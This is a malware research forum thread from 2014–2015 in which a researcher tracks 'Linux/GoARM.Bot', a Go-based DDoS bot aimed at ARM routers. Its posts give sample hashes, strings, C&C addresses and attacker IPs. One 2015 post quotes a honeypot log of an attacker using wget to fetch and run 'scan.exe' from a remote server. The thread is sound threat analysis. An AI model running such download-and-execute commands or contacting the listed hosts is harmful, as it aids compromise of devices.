Linux/GoARM.Bot

Forum for analysis and discussion about malware.

Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 17, 2014 6:55 am

I was reported this GOARM Binary: https://www.virustotal.com/en/file/81c9 ... 410603481/ Many downloads:
Image
It's an ARM architecture bot, based on Go programming compiled for Armv6 with Cypto and Encoding libs. Go projects PoC:
Code: Select all
// go runtime..
0x29B39C   runtime.selectgo
0x2AB1EC   runtime.gogo
(etc)
// go project..
0x31A3D1   /Users/fc/GoProjects/armv6/src/server2/server.go
0x31A403   /Users/fc/GoProjects/armv6/src/server2/message.pb.go
0x31A439   /Users/fc/GoProjects/armv6/src/server2/client.go
0x31BDE1   /Users/fc/GoProjects/armv6/src/main.go
0x31A3D1   /Users/fc/GoProjects/armv6/src/server2/server.go
0x31A403   /Users/fc/GoProjects/armv6/src/server2/message.pb.go
0x31A439   /Users/fc/GoProjects/armv6/src/server2/client.go
0x31BDE1   /Users/fc/GoProjects/armv6/src/main.go
// Go source codes:
 %3d: t=%3d start
 %3d: t=%3d bytes [%d]
 %3d: t=%3d end err %v
 %3d: t=%3d fix32 %d
 %3d: t=%3d fix64 %d
 %3d: t=%3d varint %d
 %3d: fetching op err %v
 %3d: t=%3d fix32 err %v
 %3d: t=%3d fix64 err %v
 %3d: t=%3d start err %v
 %3d: t=%3d unknown wire=%d
 %3d: t=%3d varint err %v
 %3d: t=%3d end
 %3d: start-end not balanced %d

HTTP send template:
Code: Select all
%s %s HTTP/1.1
User-Agent: %s
; Domain=%s
; Path=%s
; Expires=%s
; Max-Age=%d
Host: %s
^^ Spotted together with the DDoS'er tools. Feel free to verdict this further :D
You do not have the required permissions to view the files attached to this post.
Last edited by unixfreaxjp on Wed Sep 17, 2014 8:45 am, edited 1 time in total.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 17, 2014 7:54 am

Another sample, different source: https://www.virustotal.com/en/file/27d4 ... 410939480/
So it is used by other infection too.. It is official then, new malware: Linux/GoARM.Bot.
Naming explanation:
GO = GO language
ARM = specifically compiled for ARM..
Bot.. I can verdict the bot (backdoor) function and http command, so does the low level functions (connections, calls) but still working on its DDoS function, so = "Linux / GoARM.Bot" it is.
You do not have the required permissions to view the files attached to this post.
Last edited by unixfreaxjp on Wed Sep 17, 2014 12:20 pm, edited 1 time in total.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 17, 2014 8:25 am

More sample, same source as previous one: https://www.virustotal.com/en/file/c665 ... 410941384/ is actually the UPX packed of previous post sample.. viewtopic.php?f=16&t=3491#p23911
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Thu Oct 02, 2014 3:48 pm

New sample, it looks like was uploaded in mid September 2014
https://www.virustotal.com/en/file/0e5a ... 412264434/
Sample is attached.
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Tue Oct 14, 2014 2:12 pm

New sample TODAY uploads!!! :-))
Image
https://www.virustotal.com/en/file/e315 ... 413295129/
thanks ben!
Comment: only idiots who expect to infect routers with pathetic internet connection with 3MB+ payloads..
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Mon Oct 20, 2014 4:24 pm

New sample, quite big infection hits, this malware is specifically designed aim for ARM devices.
Image
VT: https://www.virustotal.com/en/file/5883 ... 413822096/ < thx to benkow
CNC:
Code: Select all
222.186.56.102||23650 | 222.186.56.0/21 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Sat Oct 25, 2014 6:32 pm

You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Sat Sep 19, 2015 7:59 am

New fresh one, attacking routers together with MrBLack & AESddos("hacker").
Image
Sample: https://www.virustotal.com/en/file/3b6d ... /analysis/
cnc: 222.186.34.220, panel: 183.60.216.182, bruter(ssh): 60.166.61.110
Code: Select all
2015-09-18 10:35:39 [session=78,ip=60.166.61.110] wget http://183.60.216.182:88/scan.exe
2015-09-18 10:35:44 [session=78,ip=60.166.61.110] chmod 777 scan.txt
2015-09-18 10:35:49 [session=78,ip=60.166.61.110] ./scan.exe &
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Wed Sep 23, 2015 7:15 pm

You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Re: Linux/GoARM.Bot

Postby unixfreaxjp » Fri Sep 25, 2015 4:35 pm

8-) Now I am sure ChinaZ is behind these latest GoARM campaigns,
today's attack with ARM(el) v7 stripped & static ELF as target looks aiming Ubuntu basis routers default pwd..
Image

And here it is:
Image

Summarized:
Code: Select all
#CHINAZ + #GoARMBot + static strip ARMel #ELF =aim #ROUTER
Atk(ssh): 14.29.32.162
Pnl: 111.206.76.35 (appdown.keyipin.com)
Cnc: 222.186.31.182:6004
Report: http://imgur.com/a/CKBPx <== BIG PICS IS HERE

Routers are not save anymore.. yet let them come, I'm ready. :lol:

Just for convincing the CNC data for evidence, took this pcap but they're closing the port after several "greetings" beforehand:
Image

Sample: https://www.virustotal.com/en/file/284a ... 443197004/
You do not have the required permissions to view the files attached to this post.
unixfreaxjp
 
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm
Reputation point: 89

Next

Return to Malware

Who is online

Users browsing this forum: Bing [Bot] and 5 guests